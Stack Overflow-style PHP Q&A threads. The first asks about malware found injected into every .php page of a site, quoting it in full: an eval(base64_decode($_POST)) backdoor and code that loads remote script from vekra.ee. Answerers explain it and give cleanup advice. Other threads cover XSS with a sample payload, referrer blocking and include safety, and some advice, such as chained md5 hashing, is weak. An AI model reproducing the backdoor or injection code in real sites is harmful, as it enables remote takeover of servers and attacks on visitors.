Can someone please advise what this php code will do? I have found this code on every .php pages only. Other pages like js / css / php.ini are fine. Is this malicious code? If yes, please suggest how to prevent the malicious activity.
Here is the Code:
global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if(!#$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
$sessdt_j = #$_SERVER["HTTP_HOST"].#$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
I haven't examined it closely, but only the line
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
shows me already that it is, if not malicious, then very very close - there is code injection possible.
It's more likely it will redirect your every page to attacker website.
The # will halt any errors so you wont get any logs from this script.
You should remove it if you want your site to work properly.
EDIT: it doesn't redirect but it will inject anything it wants on your pages.
The second part of the script where it checks for cookies will add a javascript from his website and can do malicious things.
The last part I don't think anyone will be able to guess what is it because it relies on some post variable and that's $_POST['showimg'], I guess he attacked your website with POST.
Things to do: Change your passwords, check for write permissions on your files, they shouldn't be 0777, backup database and WordPress Template, delete WordPress install and re-install from scratch. In your template search for his code then add your cleaned template.
Your problem is not the code itself, it's how it got there in the first place. You need to check the write permissions on your files/folders to make sure no one from the outside can modify them.
You mentioned that you're using wordpress, please read this article about hardening wordpress security. I suggest that you lock down your blog (if it's feasible) until you fix your security issues.
im a security analyst and i believe it is redirecting you to a possible malicious website if and only if you do not have that cookie. if you already have that cookie then the script will know you have already been there and possibly researching the malware thus not executing the redirect. The image may be like a detect debugger preset API.. this is just my opinion.
Related
the dilemma I have is my website index.php calls to a template php file on a button press like this:
case 'main':
$page = getTemplate('main.php', array('user'=>$user));
echo $page;
break;
This main.php template file is in a folder in "/var/www/template/" How do I stop people going to: domain.com/template/main.php and viewing the code for that page. I think the solution would be to make the localhost be able to pull the it and display it rather than the user or something along those lines. Any help would be appreciated thank you.
Like a comment said, the PHP file will not be printed, it will print the HTML result that the php file produce.
Maybe it produces some errors indicating vulnerabilities to a potential attacker ? If that's your case, you should handle this directly into the php code or use a .htaccess at the root of your site. You can't find some help there.
How to deny access to a file in .htaccess
Managed to fix this by putting this at the top of the php page I wanted to render:
<?php
if (!isset($_GET['page'])) {
header('Location: /main');
exit();
}
?>
This means if someone goes "domain.com/template/main.php" to attempt to view the source code, it will redirect them back to the main webpage for my site. Thanks for your suggestions however.
I am building a website where people need to go to 1 page. The page checks if something already has been done. If it hasn't done yet, it will load the page without redirecting. It will give the steps somebody has te do. After doing that, it will redirect the person to a other file. And check if it has been done and give a reward. Between those 2 request people can change variables. Or go directly to the second file. How can I make sure people don't skip the other file? I tought about using google recaptcha v2, but I want to get some advice from you guys first. Because I know that there are captcha solving websites (DeathByCaptcha etc.
I would be really thankful!
EDIT:
I already have made a vertification method. Where people will get a key at the first file. And the second file checks it. Before those 2 files, there is another file, that just sends the persons IP tru session. Here it is:
$GRFL = $_POST['amount'];
$OMFG = $_POST['username'];
$ip = GetIP();
$ip = md5(md5(md5(md5(md5(md5(md5(md5(md5(md5(md5($ip)))))))))));
if ($_SESSION['ip'] != $ip) {
header('Location: '.$url);
die();
} else {
$query = md5($ip.md5(md5($GRFL.$OMFG.$ip).md5($OMFG)).$ip);
$_SESSION['query'] = $query;
}
But I don't know if it is enough...
I'm owner of some web site with dozen of web pages. Pages were made by using PHP. Before some time I discovered that some guys by using Joomla CMS and wrapper menu option included starting (login page) there and on this way confused members and other visitors, especially because "window" of wrapper isn't enough big and some information on my page aren't visible. On this way visitors connect these pages with me and get bad feeling about whole my site. I contacted these guys but no answer, then I tried to solve it by using $_SERVER['HTTP_REFERER'] super variable but I didn't get right and working solution for this problem. Someone experienced similar problem? Thanks.
EDIT - This is the code
$HTTP_REFERRER=%SERVER['HTTP_REFERER'];
if ($HTTP_REFERRER) {
// check if the referrer is on your noentry list
// if so redirect it to another page
if ($HTTP_REFERRER == "www.mean.visitor.com") {
echo 'referer is' . $HTTP_REFERRER;
die;
} // shows the referrer and formats ur local harddrive echo "You came from $HTTP_REFERRER";
} else {
//everything is OK
}
from the code you posted the first problem i see it's on the first line:
$HTTP_REFERRER=%SERVER['HTTP_REFERER'];
should be
$HTTP_REFERRER=$_SERVER['HTTP_REFERER'];
Then in the second if you must insert the web addresses you want to block. so change
if ($HTTP_REFERRER == "www.mean.visitor.com")
with
if ($HTTP_REFERRER == "the address yo want to block")
And write die() instead of die.
has something changed?
Ok so I just wanted to know, is this necessarily a XSS vulnerability, as it does not output the results as such?
For example:
if($_GET['doRedirect'] == "yes") {
//redirect Page
} else {
//dont redirect page
}
then
http://example.com?doRedirect=yes
I have read up on all of the XSS stuff and thought I had a good understanding of it, although now im slightly confused. Is XSS only possible if the user input is then output on the page?
Many thanks :)
That should be safe.
Cross site scripting can only occur if you actually output something user-generated on your page.
An example of this would be if you took in a user's name as the get parameter name and did the following:
<?php
echo "Hello, {$_GET['name']}. How are you today?";
?>
In this case, if someone set the name-parameter to <script>alert('Hello, There!');</script>, they've suddenly got some JavaScript running on an URL hosted on your domain.
Granted, that example is pretty benign, but the fact that they could run that code means they could run any code they wished. They could, for instance, add a script that logged the usernames and passwords of all users that logged in through that URL. Your site would appear genuine, but they would have access to things they shouldn't have.
If you're confused about, or interested in learning more about cross site scripting, take a look at these questions:
What is the general concept behind XSS?
What is the way(best practice) to deal with XSS?
How does XSS work?
What are the best practices for avoiding xss attacks in a PHP site
Assuming that you only use the doRedirect input parameter in that if statement and nothing else then it is not vunerable.
If you were to do something like this, then yes it would be vulnerable:
if($_GET['doRedirect'] == "yes")
{
//redirect Page
}
else
{
//dont redirect page
// Create message to display in the browser
$messageToUser = 'You selected '.$_GET['doRedirect'].' for your redirection';
}
In this case you should perform validation on the input.
<?php
if (preg_match('/^[a-z0-9]+$/', $_GET['page'])) {
$page = realpath('includes/'.$_GET['page'].'.php');
$tpl = realpath('templates/'.$_GET['page'].'.html');
if ($page && $tpl) {
include $page;
include $tpl;
} else {
// log error!
}
} else {
// log error!
}
?>
How safe would you say this is?
Gumbo here on Stack Overflow wrote it.
Dynamic Include Safety
I wanna hear your opinions.
cheers
My first thought isn't about safety, but about why in the world would you do that?
I'd say it's pretty safe. Just don't allow anything to write to those folders. PHP files are traditionally inside the web root of a server which is dangerous to start with. It would be better to place the files being loaded to an area that's absolutely inaccessible to the outside given a configuration error or a .htaccess file going missing.
you including your own code. how safe is it?
I could see some potential issues there, especially if the 'page' variable contained '..' or other such things that could allow them to see something they weren't supposed to be able to see.
I do something similar on a few sites of mine, but I would first check 'page' to make sure it references one of a set of allowed pages.